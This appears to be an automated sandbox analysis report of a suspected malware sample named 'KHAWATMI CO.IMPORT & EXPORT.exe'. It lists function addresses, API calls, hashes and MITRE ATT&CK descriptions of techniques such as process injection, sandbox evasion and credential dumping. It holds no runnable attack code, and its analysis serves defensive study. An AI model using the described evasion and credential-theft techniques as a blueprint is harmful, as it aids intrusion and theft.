Function 03D19529, Relevance: .2, Instructions: 157libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,00000000,?,-6AFEEF8C,03D16A21,00000000,?,?), ref: 03D18923

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d04815b2c6bec79392d57e8a8d48ddd022080a8bc5e98eb1a2f307afb2f34e6e
Instruction ID: 2dfc9e7a9d5d03f2db7984fc2e992deb87cbeb04c301ce36a9b65c9fdb262ccf
Opcode Fuzzy Hash: d04815b2c6bec79392d57e8a8d48ddd022080a8bc5e98eb1a2f307afb2f34e6e
Instruction Fuzzy Hash: FB510A72D09266EFDB30CF28D822AEAB7B1FF15750F49056ADC89AB604C3715991CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 03D1972D, Relevance: .1, Instructions: 145libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,00000000,?,-6AFEEF8C,03D16A21,00000000,?,?), ref: 03D18923

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8ecf0e32a5383aeb8e86a7b1b2fb53683aec06a7266003385f7350d02642f4dd
Instruction ID: 4772f666696a6082f19a21654f8e020bb0899b715705a104b3764077cbb4c0fe
Opcode Fuzzy Hash: 8ecf0e32a5383aeb8e86a7b1b2fb53683aec06a7266003385f7350d02642f4dd
Instruction Fuzzy Hash: 57511972D0A656EFDB30CF28D821AEAB7B1FF15750F49051ADC89AB604C3315991CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 03D1964D, Relevance: .1, Instructions: 145libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNELBASE(?,?,?,00000000,?,-6AFEEF8C,03D16A21,00000000,?,?), ref: 03D18923

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 89896508ddd2538dc1c958f09ab0bed4c0bec06ded8e9d9fa4e081af5b9833f7
Instruction ID: d16f8db00912c6335d73df5d5d7c53f810ea6e17436edaf206374b248588b8e6
Opcode Fuzzy Hash: 89896508ddd2538dc1c958f09ab0bed4c0bec06ded8e9d9fa4e081af5b9833f7
Instruction Fuzzy Hash: 61511C72D09656EFDB30CF28D821AEAB7B1FF15710F49452ADC89AB604C3715991CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 03D1317D, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b11a43cf713f870e5de1c763ba881bde6bc45120701289cd75c8f02fa74c8081
Instruction ID: f09e6740737617ec008183cb98b7b254be7be69e83f7bc341d93971beb4a6b02
Opcode Fuzzy Hash: b11a43cf713f870e5de1c763ba881bde6bc45120701289cd75c8f02fa74c8081
Instruction Fuzzy Hash: 9251F471A4934ADBDB70CF29C895EEAB7B1FF99740F51852ED8899B610D3318A42CB01

Uniqueness

Uniqueness Score: -1.00%

Function 03D1311C, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0b6bfc00490c5fe82c7f74c535f22121255944db1ee5f66089e39ffe0d85708
Instruction ID: 118fe6a8e65c226cb56653e144e24a02112b32a1f463ae1558af3e7a33d4287d
Opcode Fuzzy Hash: a0b6bfc00490c5fe82c7f74c535f22121255944db1ee5f66089e39ffe0d85708
Instruction Fuzzy Hash: DC51E576604349AFCB70CE29C8947DEB7A6EF99350F51412EDC8C9B311D7309A46D712

Uniqueness

Uniqueness Score: -1.00%

Function 03D123F9, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24be007781e924f8ddce8ff869c073f3181d996571c60375403c702efdc84f20
Instruction ID: ed3d1910c5af0212830ba9fcbeef5def6f008b684bfbd26165c16c240ccc1fd0
Opcode Fuzzy Hash: 24be007781e924f8ddce8ff869c073f3181d996571c60375403c702efdc84f20
Instruction Fuzzy Hash: D2519CB1A04689DFCB74CE28DC64BEA3BE6AF58340F40412AEC8DDB255D7318A51CB55

Uniqueness

Uniqueness Score: -1.00%

Function 03D11EE2, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 94cd42e7a79668efa8145f5711fbd8164ba5cb04b9b433f70e5a423aa295d897
Instruction ID: a653a86d514d0d9a9414f9d454db613da51e5bdc5d0eef13265d5a61680d3dcd
Opcode Fuzzy Hash: 94cd42e7a79668efa8145f5711fbd8164ba5cb04b9b433f70e5a423aa295d897
Instruction Fuzzy Hash: AE51E6716087C66BD732CE3C8C947DABF62AF47310F89839EC8984B299C3315555C752

Uniqueness

Uniqueness Score: -1.00%

Function 03D197B7, Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c543644e6e3fd1cf80a6b81d6e2a504eb16dc6e1a021f738739c42d2ad7c74fd
Instruction ID: 7d50517430cdb004b8344861f0bad56922d2f2cc1c257c4f9a3cb4710a7d19b7
Opcode Fuzzy Hash: c543644e6e3fd1cf80a6b81d6e2a504eb16dc6e1a021f738739c42d2ad7c74fd
Instruction Fuzzy Hash: B7511B72905665AFCB30CE28D8657DAB7F2BF15750F8A001ADC8DAB600D3716D91CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 03D149AE, Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f574f931a4a40316c25dd5859b43e08bd6e285de49e2ef2eacb72cf26263703
Instruction ID: 2074d7af1ead6db5877cd69d7b5634c1f3b94bc4b1dbc4cb4e3d71b51a6a6542
Opcode Fuzzy Hash: 1f574f931a4a40316c25dd5859b43e08bd6e285de49e2ef2eacb72cf26263703
Instruction Fuzzy Hash: 6E51AF72A05748ABCB34CE2AD9A57EAB3F3AF98700F59451ED94E8F704C730A6518B44

Uniqueness

Uniqueness Score: -1.00%

Function 03D10361, Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: f702eccd04064a9cf7b443ff41d58c961478886bd1dec83e519d963de7c076a5
Instruction ID: f9d1dcb20b8cd696d504bc067fe7aae271bca23330f44dda499653264565f329
Opcode Fuzzy Hash: f702eccd04064a9cf7b443ff41d58c961478886bd1dec83e519d963de7c076a5
Instruction Fuzzy Hash: 52311E35948305EFCB54BF309962AAEBBB0EF12354F42481DDCC267826D33188A0DB53

Uniqueness

Uniqueness Score: -1.00%

Function 03D18C3C, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bb0124d98fc237436e4d145799e4fcdd3f7cf6ea1656c1220b23c6737dcd96d
Instruction ID: 10f25cba9230a2f68bf018d3183f65eccaab22054a4f239a95df723cf4eaf5fb
Opcode Fuzzy Hash: 4bb0124d98fc237436e4d145799e4fcdd3f7cf6ea1656c1220b23c6737dcd96d
Instruction Fuzzy Hash: 4D21C03660934A9FCB34DF68E8D06E663A2BF6A740F884069E9C9CB602E2319951D715

Uniqueness

Uniqueness Score: -1.00%

Function 03D18E26, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567a76a3a429e46df4caec374d6c6bec5811b1a3022f792d51de842703135b50
Instruction ID: e7b130ae3b254405be5b9d56e647830e1a1fc2b63218bd08e9f056af35a11ce3
Opcode Fuzzy Hash: 567a76a3a429e46df4caec374d6c6bec5811b1a3022f792d51de842703135b50
Instruction Fuzzy Hash: BC01A975608688DFCB38DF14D9D8ADA77A1FB99711F05446DD80A8F320C7319A44DB16

Uniqueness

Uniqueness Score: -1.00%

Function 03D16245, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d93d15f67e9b827cc26c10cfdee0f0aea015afd76e64e8d4fafe872fff2f61e
Instruction ID: c086cdebd2cdaaa2be8e88c4caef6fc8431c33c03b5c37959da5d1d66bd64566
Opcode Fuzzy Hash: 0d93d15f67e9b827cc26c10cfdee0f0aea015afd76e64e8d4fafe872fff2f61e
Instruction Fuzzy Hash: C9B092B76016808FEF02CE08C482B4073B0FB15A84B0904D4E802CBB11D228E900CA00

Uniqueness

Uniqueness Score: -1.00%

Function 03D18769, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.604120925.0000000003D10000.00000040.00000001.sdmp, Offset: 03D10000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 004204E0, Relevance: 101.9, APIs: 56, Strings: 2, Instructions: 417COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60 ref: 00420541
__vbaStrCat.MSVBVM60(00404230,00404228), ref: 00420551
__vbaStrMove.MSVBVM60 ref: 00420562
__vbaI4Str.MSVBVM60(00000000), ref: 00420565
#537.MSVBVM60(00000000), ref: 0042056C
__vbaStrMove.MSVBVM60 ref: 00420577
__vbaStrCmp.MSVBVM60(00402D18,00000000), ref: 0042057F
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00420599
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 004205BD
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 004205E8
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,00000108), ref: 00420616
__vbaFreeObj.MSVBVM60 ref: 0042061B
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 00420633
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 00420658
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,00000130), ref: 0042067E
__vbaStrMove.MSVBVM60 ref: 00420689
__vbaFreeObj.MSVBVM60 ref: 00420692
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 004206AA
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 004206CF
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,00000118), ref: 004206F5
__vbaFreeObj.MSVBVM60 ref: 004206FA
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 00420712
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,0000001C), ref: 00420737
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402D1C,00000064), ref: 00420759
__vbaFreeObj.MSVBVM60 ref: 0042075E
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 0042077E
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 004207A3
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,00000070), ref: 004207C3
__vbaFreeObj.MSVBVM60 ref: 004207C8
__vbaStrCat.MSVBVM60(00404240,00404238), ref: 004207D8
__vbaStrMove.MSVBVM60 ref: 004207E9
#514.MSVBVM60(?,00000002), ref: 004207F1
__vbaStrMove.MSVBVM60 ref: 004207FC
__vbaStrCmp.MSVBVM60(00402ABC,00000000), ref: 00420804
__vbaFreeStr.MSVBVM60 ref: 00420817
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 00420838
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000014), ref: 0042085D
__vbaHresultCheckObj.MSVBVM60(00000000,?,00402B28,0000013C), ref: 004208A4
__vbaFreeObj.MSVBVM60 ref: 004208AD
#539.MSVBVM60(?,00000001,00000001,00000001), ref: 004208BD
__vbaStrVarMove.MSVBVM60(?), ref: 004208C7
__vbaStrMove.MSVBVM60 ref: 004208D8
__vbaFreeVar.MSVBVM60 ref: 004208DD
#706.MSVBVM60(00000001,00000000,00000000), ref: 004208E9
__vbaStrMove.MSVBVM60 ref: 004208F4
__vbaNew2.MSVBVM60(00402B18,00422390), ref: 00420909
__vbaHresultCheckObj.MSVBVM60(00000000,02B5ED94,00402B08,00000038,?,?,?,?,?,?,?,?), ref: 00420973
__vbaVar2Vec.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 00420981
__vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?), ref: 0042098F
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?), ref: 00420998
__vbaFreeStr.MSVBVM60(00420A03), ref: 004209E0
__vbaFreeStr.MSVBVM60 ref: 004209E5
__vbaFreeStr.MSVBVM60 ref: 004209EA
__vbaFreeStr.MSVBVM60 ref: 004209EF
__vbaAryDestruct.MSVBVM60(00000000,?), ref: 004209F7
__vbaFreeStr.MSVBVM60 ref: 00420A00

Strings

Lovndringen3, xrefs: 0042092D
UNANTAGONISINGS, xrefs: 00420881

Memory Dump Source

Source File: 00000001.00000002.602791811.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.602774650.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.602822633.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.602829141.0000000000424000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CheckHresult$Move$New2$#514#537#539#706CopyDestructListVar2
String ID: Lovndringen3$UNANTAGONISINGS
API String ID: 3105435306-1607536084
Opcode ID: 4ff2387646ccfa6251b754e4a0ffdf5f9bb9785163c9cb53eb8ad9e5fb30da59
Instruction ID: 05e99e082ae48ae8cef77b893303c8b95861518e5c2e0ae411100a3af7e35fc7
Opcode Fuzzy Hash: 4ff2387646ccfa6251b754e4a0ffdf5f9bb9785163c9cb53eb8ad9e5fb30da59
Instruction Fuzzy Hash: FCE19471E40228AFCB14DFA4DD89E9DBBB4FF58301F60402AF505B72A1D7B86945CB98

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: KHAWATMI CO.IMPORT & EXPORT.exe PID: 6316 Parent PID: 5804 KHAWATMI CO.IMPORT & EXPORT.exeCOMMON

Executed Functions

Function 0056B7E6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 0056B809
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056B89A

Strings

Ourn, xrefs: 0056B883

Memory Dump Source

Source File: 00000018.00000002.1025927319.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID: Ourn
API String ID: 3235210055-118123239
Opcode ID: f49c899b82f6d599defae4b3c675c6e594888728b2edbca1cd0eea9b955451b1
Instruction ID: 8a0f241074eb1ca2e521911007b3d941aeff99c13d0879c93dab0e9bb76ece29
Opcode Fuzzy Hash: f49c899b82f6d599defae4b3c675c6e594888728b2edbca1cd0eea9b955451b1
Instruction Fuzzy Hash: B50156B15053019FF7488F25C98DB5ABBA4BF14366F258298E1218B0F6C7B8C9C0CF21

Uniqueness

Uniqueness Score: -1.00%

Function 0056B811, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056B89A

Strings

Ourn, xrefs: 0056B883

Memory Dump Source

Source File: 00000018.00000002.1025927319.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID: Ourn
API String ID: 2706961497-118123239
Opcode ID: 4f635d847d2fcebc4b4eb9b7afe541cfe84a8c2443cfc84847ae0382d481c55c
Instruction ID: 84872592e7c38bb7bf0eb8256816d234934168fa152aa5d10bcc8cd5a1bf1756
Opcode Fuzzy Hash: 4f635d847d2fcebc4b4eb9b7afe541cfe84a8c2443cfc84847ae0382d481c55c
Instruction Fuzzy Hash: 2B01F97094A349DFEB054F28C50BF69FBA0FF11755B108AA8D0928B8E5C3368582DF40

Uniqueness

Uniqueness Score: -1.00%

Function 0056B6B4, Relevance: 1.6, APIs: 1, Instructions: 62nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056B78C

Memory Dump Source

Source File: 00000018.00000002.1025927319.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: a195f36ce7e4a52402e629d2bf1133d81ec73ebca6d00c98ade3d0b34d1766d1
Instruction ID: 6ee19a09c41fe794bcd387628f0aa5e174ae86cf642fdf1483dc55663356deec
Opcode Fuzzy Hash: a195f36ce7e4a52402e629d2bf1133d81ec73ebca6d00c98ade3d0b34d1766d1
Instruction Fuzzy Hash: DB113671100302AFDB148B78CAC9A467F65FF59360FA142F1D946CB1A2D3B4D8C18620

Uniqueness

Uniqueness Score: -1.00%

Function 0056B6AD, Relevance: 1.6, APIs: 1, Instructions: 56nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056B78C

Memory Dump Source

Source File: 00000018.00000002.1025927319.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: fa7618046a834475a0c6cb80003ec80931272cf6c5a6b2d00be3ec0ca6a2fcb0
Instruction ID: 9a7dbdddc2098a0aff1f8a409579131c026dab23ca5fdbd98a105fe52b5d4d9a
Opcode Fuzzy Hash: fa7618046a834475a0c6cb80003ec80931272cf6c5a6b2d00be3ec0ca6a2fcb0
Instruction Fuzzy Hash: D81104B0100306AFEB149B68CACAB567F15FF59720F6142E5E906CB2A2D364D8C18A24

Uniqueness

Uniqueness Score: -1.00%

Function 0056B727, Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL(000000FF,-00000024,-00000020,?,?,?,?,?,?,00000000,?), ref: 0056B78C

Memory Dump Source

Source File: 00000018.00000002.1025927319.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: ae05a637634b147f5d8fd6620b0b38d262ba8b411f9c7f8d8a5e4bd9761fd1ac
Instruction ID: 58490d3c703126d93d881097b444b26b380b3665eec62a50dc3569bfd277409d
Opcode Fuzzy Hash: ae05a637634b147f5d8fd6620b0b38d262ba8b411f9c7f8d8a5e4bd9761fd1ac
Instruction Fuzzy Hash: 4001F73098E28AEBEB121B18C002CB5FB90FF17B547144EA9C0D397982C3234053DB44

Uniqueness

Uniqueness Score: -1.00%

Function 0056B512, Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-00000001D699F946,4120DA5A), ref: 0056B5D2

Memory Dump Source

Source File: 00000018.00000002.1025927319.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 346978870d6aecf1e5e172f90e5f9b97d9af9176bf21a7ab30266d4e48d0f110
Instruction ID: b0664db326baa796a846dd4706abbaf34c7c0707ea1f051dd7acfed8776fd0f4
Opcode Fuzzy Hash: 346978870d6aecf1e5e172f90e5f9b97d9af9176bf21a7ab30266d4e48d0f110
Instruction Fuzzy Hash: 1D11043094A34EDBEB228F18C582EE9FB66FF45B01F408A64C59A5B609C3320593DF04

Uniqueness

Uniqueness Score: -1.00%

Function 0056B4E7, Relevance: 1.5, APIs: 1, Instructions: 44threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-00000001D699F946,4120DA5A), ref: 0056B5D2

Memory Dump Source

Source File: 00000018.00000002.1025927319.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 94da71dd1a37e9c4bbdda446904439c232190c4ff37507b613261606815aa86e
Instruction ID: 63909389b036fd609d93bc02b28aafa4b7b9a1fc5e1781b58b6a2effc90fba82
Opcode Fuzzy Hash: 94da71dd1a37e9c4bbdda446904439c232190c4ff37507b613261606815aa86e
Instruction Fuzzy Hash: 270128B19083858FDB31CF28DDD87C63BB7BF89300F944446CD898B22AE37006828E11

Uniqueness

Uniqueness Score: -1.00%

Function 0056B4FA, Relevance: 1.5, APIs: 1, Instructions: 33threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(-00000001D699F946,4120DA5A), ref: 0056B5D2

Memory Dump Source

Source File: 00000018.00000002.1025927319.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: f65db422b956bb0d8efc36588042786b99bd41a91a20b307f49ccae449b012f4
Instruction ID: 79bd7ba7bd42be0a1cfbcd90549576f858ca7d6746b450a29e38fb52747b2395
Opcode Fuzzy Hash: f65db422b956bb0d8efc36588042786b99bd41a91a20b307f49ccae449b012f4
Instruction Fuzzy Hash: A1F090B19043499BDF71CF29DEC87DA36A7BF88301F904111DE5D4B319E37016828E21

Uniqueness

Uniqueness Score: -1.00%

Function 0056B7DC, Relevance: 1.3, APIs: 1, Instructions: 18sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000005), ref: 0056B809
NtProtectVirtualMemory.NTDLL(000000FF,-0000101C,-00000018), ref: 0056B89A

Memory Dump Source

Source File: 00000018.00000002.1025927319.000000000056B000.00000040.00000001.sdmp, Offset: 0056B000, based on PE: false

Similarity

API ID: MemoryProtectSleepVirtual
String ID:
API String ID: 3235210055-0
Opcode ID: 5b4341acff33b09d037b51dbc8a5e4b5c575c976227d42598dbf46acf44a5bae
Instruction ID: 4fc9dd9147bd1ff23bc62051daa42869417c59b8df113b657ac188041ac93e7a
Opcode Fuzzy Hash: 5b4341acff33b09d037b51dbc8a5e4b5c575c976227d42598dbf46acf44a5bae
Instruction Fuzzy Hash: CDE08C70A043029FF704AF64888DB583B60BF49322F4A82C8E6098F0A3CB20C8C1CB20

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

